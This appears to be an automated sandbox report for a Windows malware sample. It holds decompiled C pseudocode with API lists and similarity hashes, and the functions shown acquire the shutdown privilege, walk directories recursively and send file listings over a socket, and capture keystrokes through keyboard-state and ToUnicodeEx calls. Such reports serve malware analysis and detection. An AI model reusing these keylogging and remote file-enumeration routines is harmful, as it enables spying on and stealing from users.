				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0041396c
0x0041397e
0x0041398a
0x00413996
0x0041399d
0x004139b2

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
GetLastError.KERNEL32 ref: 004139A3

Strings

SeShutdownPrivilege, xrefs: 00413978

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
Instruction ID: fcc62124dca6382e8ff7f462a1d037d759b9923c43a5f98482535144c24e2b82
Opcode Fuzzy Hash: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
Instruction Fuzzy Hash: 44F03A71902229ABDB10AFA0ED0DAEFBF7CEF05652F100064B805A1056E6348B14CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 004077EC, Relevance: 9.3, APIs: 6, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004077EC(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				void* _t206;
				char* _t220;
				char* _t221;
				void* _t255;
				void* _t264;
				signed int _t267;
				void* _t273;
				void* _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				void* _t287;

				_t255 = __edx;
				_t188 = __ecx;
				E004510A8(E00452622, _t279);
				_t282 = _t281 - 0x300;
				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
				_t185 = _t188;
				 *(_t279 - 0x18) = _t185;
				E004020D5(_t185, _t279 - 0x9c);
				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
				 *_t185 = 0;
				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
				_t186 = _t185 + 4;
				E0040498B(_t186);
				_t283 = _t282 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t106 = E00404A08(_t255, _t264);
				_t289 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t283 = _t283 - 0x18;
					L00402F93(_t186, _t283, L00402FB7(_t279 - 0x6c, _t279 + 0x38, 0x46c238), _t289, _t279 + 0x50);
					_push(0x64);
					_t186 = _t186 & 0xffffff00 | E00404AA4(_t186, _t186, _t179, _t289) == 0xffffffff;
					E00401FC7();
					_t291 = _t186;
					if(_t186 != 0) {
						E00404E0B( *(_t279 - 0x18) + 4);
						 *((intOrPtr*)(_t279 - 0x20)) = 1;
						_push(0x4685d0);
						_t157 = _t279 - 0x20;
						L3:
						_push(_t157);
						L4:
						E0043205A();
					}
				}
				_t266 = E0040230A(_t279 + 0x20, _t279 - 0x30);
				_t111 = E004022CD(_t279 + 0x20, _t279 - 0x34);
				E00408226(_t279 - 0x3c,  *((intOrPtr*)(E0040230A(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
				_t284 = _t283 + 0xc;
				_t256 = _t279 + 8;
				_t273 = FindFirstFileW(L00401EEB(E00407514(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
				 *(_t279 - 0x1c) = _t273;
				L00401EF0();
				_t291 = _t273 - 0xffffffff;
				if(_t273 != 0xffffffff) {
					goto L7;
				} else {
					_t283 = _t284 - 0x18;
					E00402084(_t186, _t283, 0x45f6bc);
					_push(0x65);
					E00404AA4(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
					E00404E0B( *(_t279 - 0x18) + 4);
					 *((intOrPtr*)(_t279 - 0x24)) = 2;
					_push(0x4685d0);
					_t157 = _t279 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t273, _t279 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t186 =  *(_t279 - 0x18);
					__eflags =  *_t186;
					if( *_t186 == 0) {
						__eflags =  *(_t279 - 0x304) & 0x00000010;
						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
							L31:
							E0040427F(_t186, _t279 - 0x84, _t279 - 0x2d8);
							_t266 = E0040230A(_t279 - 0x84, _t279 - 0x3c);
							_t276 = E004022CD(_t279 - 0x84, _t279 - 0x38);
							E00408226(_t279 - 0x30,  *((intOrPtr*)(E0040230A(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
							_t284 = _t284 + 0xc;
							__eflags = E00408097(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								L00401EF0();
								_t273 =  *(_t279 - 0x1c);
								continue;
							} else {
								E00401FD1(_t279 - 0x9c, _t256, _t276, E004020AB(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
								E00401FC7();
								_t284 = _t284 - 0x18;
								_t256 = L00402F93(_t186, _t279 - 0x54, E0041739C(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x46c238);
								L00402F93(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
								_push(0x66);
								_t154 = E00404AA4(_t186, _t186 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
								E00401FC7();
								E00401FC7();
								__eflags = _t186;
								if(_t186 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
									_push(0x4685d0);
									_t157 = _t279 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t220 = ".";
							_t158 = _t279 - 0x2d8;
							while(1) {
								_t256 =  *_t158;
								__eflags = _t256 -  *_t220;
								if(_t256 !=  *_t220) {
									break;
								}
								__eflags = _t256;
								if(_t256 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t256 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t220[2]); // 0x2e0000
									__eflags = _t256 -  *_t43;
									if(_t256 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t220 =  &(_t220[4]);
										__eflags = _t256;
										if(_t256 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t221 = L"..";
									_t160 = _t279 - 0x2d8;
									while(1) {
										_t256 =  *_t160;
										__eflags = _t256 -  *_t221;
										if(_t256 !=  *_t221) {
											break;
										}
										__eflags = _t256;
										if(_t256 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t256 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t221[2]); // 0x2e
											__eflags = _t256 -  *_t46;
											if(_t256 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t221 =  &(_t221[4]);
												__eflags = _t256;
												if(_t256 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t256 = E00408250(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0040427F(_t186, _t279 - 0x54, _t279 - 0x2d8));
											E004030A6(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
											L00401EF0();
											L00401EF0();
											_t287 = _t284 - 0x18;
											E00407350(_t186, _t287, _t164, __eflags, _t279 + 0x20);
											_t284 = _t287 - 0x18;
											E00407350(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
											_t172 = E00407C55(_t186, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												L00401EF0();
												goto L31;
											} else {
												 *((intOrPtr*)(_t279 - 0x28)) = 3;
												_push(0x4685d0);
												_t157 = _t279 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						E00401FC7();
						L00401EF0();
						L00401EF0();
						E00401FC7();
						_t133 = E00401FC7();
						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
						return _t133;
					} else {
						FindClose(_t273);
						_t206 = _t186 + 4;
					}
					L10:
					E00404E0B(_t206);
					goto L37;
				}
				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
				FindClose(_t273);
				_t267 =  *(_t279 - 0x18);
				L00402F93(_t186, _t284 - 0x18, L00402FB7(_t279 - 0x54, _t279 + 0x38, 0x46c238), __eflags, _t279 + 0x50);
				_push(0x67);
				E00404AA4(_t186, _t267 + 4, _t124, __eflags);
				E00401FC7();
				_t206 = _t267 + 4;
				goto L10;
			}

0x004077ec
0x004077ec
0x004077f1
0x004077f6
0x004077ff
0x00407802
0x00407804
0x0040780d
0x00407812
0x00407816
0x00407819
0x0040781d
0x00407822
0x00407827
0x00407831
0x00407832
0x00407833
0x00407834
0x00407837
0x0040783c
0x0040783e
0x00407bf0
0x00407bf2
0x00000000
0x00407844
0x00407844
0x00407862
0x00407868
0x00407874
0x0040787a
0x0040787f
0x00407881
0x00407889
0x0040788e
0x00407895
0x0040789a
0x0040789d
0x0040789d
0x0040789e
0x0040789e
0x0040789e
0x00407881
0x004078af
0x004078b8
0x004078d4
0x004078d9
0x004078e8
0x00407902
0x00407904
0x0040790a
0x0040790f
0x00407912
0x00000000
0x00407914
0x00407914
0x0040791e
0x00407923
0x0040792b
0x00407933
0x00407938
0x0040793f
0x00407944
0x00000000
0x00407944
0x0040794c
0x0040794c
0x00407954
0x0040795a
0x0040795c
0x00000000
0x00000000
0x00407962
0x00407965
0x00407968
0x0040797e
0x00407985
0x00407a8c
0x00407a99
0x00407aad
0x00407abe
0x00407ad8
0x00407add
0x00407af1
0x00407af4
0x00407b91
0x00407b97
0x00407b9c
0x00000000
0x00407afa
0x00407b15
0x00407b1d
0x00407b22
0x00407b4c
0x00407b50
0x00407b56
0x00407b5b
0x00407b60
0x00407b63
0x00407b69
0x00407b74
0x00407b79
0x00407b7b
0x00000000
0x00407b7d
0x00407b7d
0x00407b84
0x00407b89
0x00000000
0x00407b89
0x00407b7b
0x0040798b
0x0040798b
0x00407990
0x00407996
0x00407996
0x00407999
0x0040799c
0x00000000
0x00000000
0x0040799e
0x004079a1
0x004079b8
0x004079b8
0x004079a3
0x004079a3
0x004079a7
0x004079a7
0x004079ab
0x00000000
0x004079ad
0x004079ad
0x004079b0
0x004079b3
0x004079b6
0x00000000
0x00000000
0x00000000
0x00000000
0x004079b6
0x004079ab
0x004079c1
0x004079c1
0x004079c3
0x00000000
0x004079c9
0x004079c9
0x004079ce
0x004079d4
0x004079d4
0x004079d7
0x004079da
0x00000000
0x00000000
0x004079dc
0x004079df
0x004079f6
0x004079f6
0x004079e1
0x004079e1
0x004079e5
0x004079e5
0x004079e9
0x00000000
0x004079eb
0x004079eb
0x004079ee
0x004079f1
0x004079f4
0x00000000
0x00000000
0x00000000
0x00000000
0x004079f4
0x004079e9
0x004079ff
0x004079ff
0x00407a01
0x00000000
0x00407a07
0x00407a2b
0x00407a30
0x00407a3c
0x00407a44
0x00407a49
0x00407a52
0x00407a57
0x00407a60
0x00407a67
0x00407a6c
0x00407a6e
0x00407a87
0x00000000
0x00407a70
0x00407a70
0x00407a77
0x00407a7c
0x00000000
0x00407a7c
0x00407a6e
0x00000000
0x00407a01
0x004079fa
0x004079fc
0x004079fc
0x00000000
0x004079fc
0x00000000
0x004079c3
0x004079bc
0x004079be
0x004079be
0x00000000
0x004079be
0x00407c17
0x00407c1d
0x00407c25
0x00407c2d
0x00407c35
0x00407c3d
0x00407c45
0x00407c52
0x0040796a
0x0040796b
0x00407971
0x00407971
0x00407974
0x00407974
0x00000000
0x00407974
0x00407ba4
0x00407ba9
0x00407baf
0x00407bd0
0x00407bd6
0x00407bdb
0x00407be3
0x00407be8
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004077F1

Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

__CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
FindNextFileW.KERNEL32(00000000,?), ref: 00407954
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

FindClose.KERNEL32(00000000), ref: 00407BA9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: 6e1c50ec99e47cdf401a26aa3eae8f72bc235e77bfa98b3cfde53def79053942
Instruction ID: c2b305b608749dbe3c980790889d4cdccc335bbb97c8ab2c1357a9fa12a4aca1
Opcode Fuzzy Hash: 6e1c50ec99e47cdf401a26aa3eae8f72bc235e77bfa98b3cfde53def79053942
Instruction Fuzzy Hash: DAC170729041099ADB14FB61CD52AEE7375AF10318F10417FE906B71D2EF386B49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004089BA, Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004089BA(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				L00431F00(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0040427F(_t30, _a4,  &_v40);
				return _a4;
			}

0x004089d1
0x004089d6
0x004089e3
0x004089e9
0x004089ea
0x004089ec
0x00408a00
0x00408a0a
0x00408a17
0x00408a33
0x00408a40
0x00408a4e

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
GetKeyboardLayout.USER32 ref: 00408A00
GetKeyState.USER32(00000010), ref: 00408A0A
GetKeyboardState.USER32(?), ref: 00408A17
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
Instruction ID: 26b3eb51535ef2b13c0bd12becad5a44fa7f6c6827bdf572dc9a3ff542bbf600
Opcode Fuzzy Hash: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
Instruction Fuzzy Hash: B2110072900208BBDB109FA4DC49FEA77ACEB0C746F100465FA04E6191DA75EA54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044A6BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0044A6BC(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x459fa8;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x459fb0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043673F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0044a6c1
0x0044a6c2
0x0044a6c9
0x0044a76d
0x0044a77b
0x0044a786
0x0044a78c
0x0044a791
0x0044a793
0x0044a793
0x0044a799
0x0044a79e
0x0044a79e
0x0044a788
0x0044a788
0x00000000
0x0044a788
0x0044a6cf
0x0044a6d4
0x00000000
0x00000000
0x0044a6da
0x0044a6df
0x0044a6e1
0x0044a6e1
0x0044a6e7
0x00000000
0x00000000
0x0044a6ec
0x0044a703
0x0044a703
0x0044a70c
0x0044a70e
0x00000000
0x00000000
0x0044a710
0x0044a715
0x0044a717
0x0044a717
0x0044a71d
0x00000000
0x00000000
0x0044a722
0x0044a740
0x0044a742
0x0044a765
0x00000000
0x0044a76a
0x0044a752
0x0044a75d
0x00000000
0x00000000
0x0044a75f
0x00000000
0x0044a75f
0x0044a724
0x0044a72c
0x00000000
0x00000000
0x0044a72e
0x0044a731
0x0044a737
0x00000000
0x00000000
0x00000000
0x0044a739
0x0044a73b
0x0044a73d
0x00000000
0x0044a73d
0x0044a6ee
0x0044a6f6
0x00000000
0x00000000
0x0044a6f8
0x0044a6fb
0x0044a701
0x00000000
0x00000000
0x00000000
0x0044a701
0x0044a707
0x0044a709
0x00000000

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793

Strings

ACP, xrefs: 0044A6DA
OCP, xrefs: 0044A710

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
Instruction ID: 46499b20fc6e19d8fdaaf79e5441ca5821e5cfb246ab753f5a47199e6154391f
Opcode Fuzzy Hash: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
Instruction Fuzzy Hash: 3C21F876680200A6F730CF64C901B9773BAEF54F65B568427E80AC7312E73ADD61C39A

Uniqueness

Uniqueness Score: -1.00%

Function 00407C55, Relevance: 7.7, APIs: 5, Instructions: 246
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00407C55(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t81;
				intOrPtr* _t83;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t146;
				signed int _t147;
				intOrPtr _t150;
				char* _t171;
				char* _t172;
				char* _t211;
				void* _t215;
				void* _t219;
				void* _t221;
				intOrPtr _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t226 = __eflags;
				_t150 = __ecx;
				E004510A8(E0045262C, _t219);
				_t222 = _t221 - 0x308;
				_push(_t146);
				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
				E004020D5(_t146, _t219 - 0x5c);
				_t81 = E0040230A(_t219 + 0x20, _t219 - 0x1c);
				_t83 = E004022CD(_t219 + 0x20, _t219 - 0x20);
				E00408226(_t219 - 0x28,  *((intOrPtr*)(E0040230A(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
				_t223 = _t222 + 0xc;
				_t204 = _t219 + 8;
				_t215 = FindFirstFileW(L00401EEB(E00407514(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
				 *(_t219 - 0x1c) = _t215;
				L00401EF0();
				if(_t215 != 0xffffffff) {
					_t147 = 0;
					__eflags = 0;
					while(1) {
						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
						__eflags = _t93;
						if(_t93 == 0) {
							break;
						}
						_t211 =  *((intOrPtr*)(_t219 - 0x18));
						__eflags =  *_t211;
						if( *_t211 == 0) {
							__eflags =  *(_t219 - 0x30c) & 0x00000010;
							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
								L25:
								E0040427F(_t147, _t219 - 0x40, _t219 - 0x2e0);
								_t102 = E0040230A(_t219 - 0x40, _t219 - 0x28);
								_t217 = E004022CD(_t219 - 0x40, _t219 - 0x24);
								E00408226(_t219 - 0x44,  *((intOrPtr*)(E0040230A(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
								_t223 = _t223 + 0xc;
								__eflags = E00408097(_t219 - 0x40, _t219 + 0x20, _t147) - 0xffffffff;
								if(__eflags == 0) {
									L29:
									L00401EF0();
									_t215 =  *(_t219 - 0x1c);
									continue;
								}
								E00401FD1(_t219 - 0x5c, _t204, _t217, E004020AB(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
								E00401FC7();
								 *(_t219 - 4) = _t147;
								_t223 = _t223 - 0x18;
								_t204 = L00402F93(_t147, _t219 - 0x74, E0041739C(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x46c238);
								L00402F93(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
								_push(0x66);
								__eflags = E00404AA4(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
								E00401FC7();
								E00401FC7();
								if((_t147 & 0xffffff00 | E00404AA4(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
									_t147 = 0;
									__eflags = 0;
									goto L29;
								}
								L00401EF0();
								E00401FC7();
								L00401EF0();
								L00401EF0();
								_t98 = 0;
								L31:
								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
								return _t98;
							}
							_t171 = ".";
							_t126 = _t219 - 0x2e0;
							while(1) {
								_t204 =  *_t126;
								__eflags = _t204 -  *_t171;
								if(_t204 !=  *_t171) {
									break;
								}
								__eflags = _t204;
								if(_t204 == 0) {
									L13:
									_t127 = _t147;
									L15:
									__eflags = _t127;
									if(_t127 == 0) {
										goto L25;
									}
									_t172 = L"..";
									_t128 = _t219 - 0x2e0;
									while(1) {
										_t204 =  *_t128;
										__eflags = _t204 -  *_t172;
										if(_t204 !=  *_t172) {
											break;
										}
										__eflags = _t204;
										if(_t204 == 0) {
											L21:
											_t129 = _t147;
											L23:
											__eflags = _t129;
											if(__eflags != 0) {
												_push(_t172);
												_t204 = E00408250(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E0040427F(_t147, _t219 - 0x74, _t219 - 0x2e0));
												E00408274(_t147, _t219 - 0xa4, _t132, _t211, __eflags);
												L00401EF0();
												L00401EF0();
												_t225 = _t223 - 0x18;
												E00407350(_t147, _t225, _t132, __eflags, _t219 + 0x20);
												_t223 = _t225 - 0x18;
												E00407350(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
												E00407C55(_t211, _t204, __eflags);
												L00401EF0();
											}
											goto L25;
										}
										_t204 =  *((intOrPtr*)(_t128 + 2));
										_t29 =  &(_t172[2]); // 0x2e
										__eflags = _t204 -  *_t29;
										if(_t204 !=  *_t29) {
											break;
										}
										_t128 = _t128 + 4;
										_t172 =  &(_t172[4]);
										__eflags = _t204;
										if(_t204 != 0) {
											continue;
										}
										goto L21;
									}
									asm("sbb eax, eax");
									_t129 = _t128 | 0x00000001;
									__eflags = _t129;
									goto L23;
								}
								_t204 =  *((intOrPtr*)(_t126 + 2));
								_t26 =  &(_t171[2]); // 0x2e0000
								__eflags = _t204 -  *_t26;
								if(_t204 !=  *_t26) {
									break;
								}
								_t126 = _t126 + 4;
								_t171 =  &(_t171[4]);
								__eflags = _t204;
								if(_t204 != 0) {
									continue;
								}
								goto L13;
							}
							asm("sbb eax, eax");
							_t127 = _t126 | 0x00000001;
							__eflags = _t127;
							goto L15;
						}
						FindClose(_t215);
						L6:
						E00401FC7();
						L00401EF0();
						L00401EF0();
						_t98 = _t147;
						goto L31;
					}
					FindClose(_t215);
					E00401FC7();
					L00401EF0();
					L00401EF0();
					_t98 = 1;
					goto L31;
				}
				_t147 = 1;
				goto L6;
			}

0x00407c55
0x00407c55
0x00407c5a
0x00407c5f
0x00407c65
0x00407c68
0x00407c6b
0x00407c71
0x00407c7d
0x00407c8b
0x00407ca7
0x00407cac
0x00407cbb
0x00407cd8
0x00407cda
0x00407ce3
0x00407ceb
0x00407cf1
0x00407cf1
0x00407cf3
0x00407cfb
0x00407d01
0x00407d03
0x00000000
0x00000000
0x00407d09
0x00407d0c
0x00407d0f
0x00407d37
0x00407d3e
0x00407e2e
0x00407e38
0x00407e44
0x00407e57
0x00407e6e
0x00407e73
0x00407e83
0x00407e86
0x00407f3f
0x00407f42
0x00407f47
0x00000000
0x00407f47
0x00407ea4
0x00407eac
0x00407eb1
0x00407eb4
0x00407edb
0x00407edf
0x00407ee5
0x00407ef2
0x00407efb
0x00407f06
0x00407f0d
0x00407f39
0x00407f3d
0x00407f3d
0x00000000
0x00407f3d
0x00407f12
0x00407f1a
0x00407f22
0x00407f2a
0x00407f2f
0x00407f70
0x00407f73
0x00407f80
0x00407f80
0x00407d44
0x00407d49
0x00407d4f
0x00407d4f
0x00407d52
0x00407d55
0x00000000
0x00000000
0x00407d57
0x00407d5a
0x00407d71
0x00407d71
0x00407d7a
0x00407d7a
0x00407d7c
0x00000000
0x00000000
0x00407d82
0x00407d87
0x00407d8d
0x00407d8d
0x00407d90
0x00407d93
0x00000000
0x00000000
0x00407d95
0x00407d98
0x00407daf
0x00407daf
0x00407db8
0x00407db8
0x00407dba
0x00407dbc
0x00407ddc
0x00407de4
0x00407df0
0x00407df8
0x00407dfd
0x00407e06
0x00407e0b
0x00407e17
0x00407e1e
0x00407e29
0x00407e29
0x00000000
0x00407dba
0x00407d9a
0x00407d9e
0x00407d9e
0x00407da2
0x00000000
0x00000000
0x00407da4
0x00407da7
0x00407daa
0x00407dad
0x00000000
0x00000000
0x00000000
0x00407dad
0x00407db3
0x00407db5
0x00407db5
0x00000000
0x00407db5
0x00407d5c
0x00407d60
0x00407d60
0x00407d64
0x00000000
0x00000000
0x00407d66
0x00407d69
0x00407d6c
0x00407d6f
0x00000000
0x00000000
0x00000000
0x00407d6f
0x00407d75
0x00407d77
0x00407d77
0x00000000
0x00407d77
0x00407d12
0x00407d18
0x00407d1b
0x00407d23
0x00407d2b
0x00407d30
0x00000000
0x00407d30
0x00407f50
0x00407f59
0x00407f61
0x00407f69
0x00407f6e
0x00000000
0x00407f6e
0x00407ced
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00407C5A

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407CD2
FindNextFileW.KERNEL32(00000000,?), ref: 00407CFB
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407D12

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

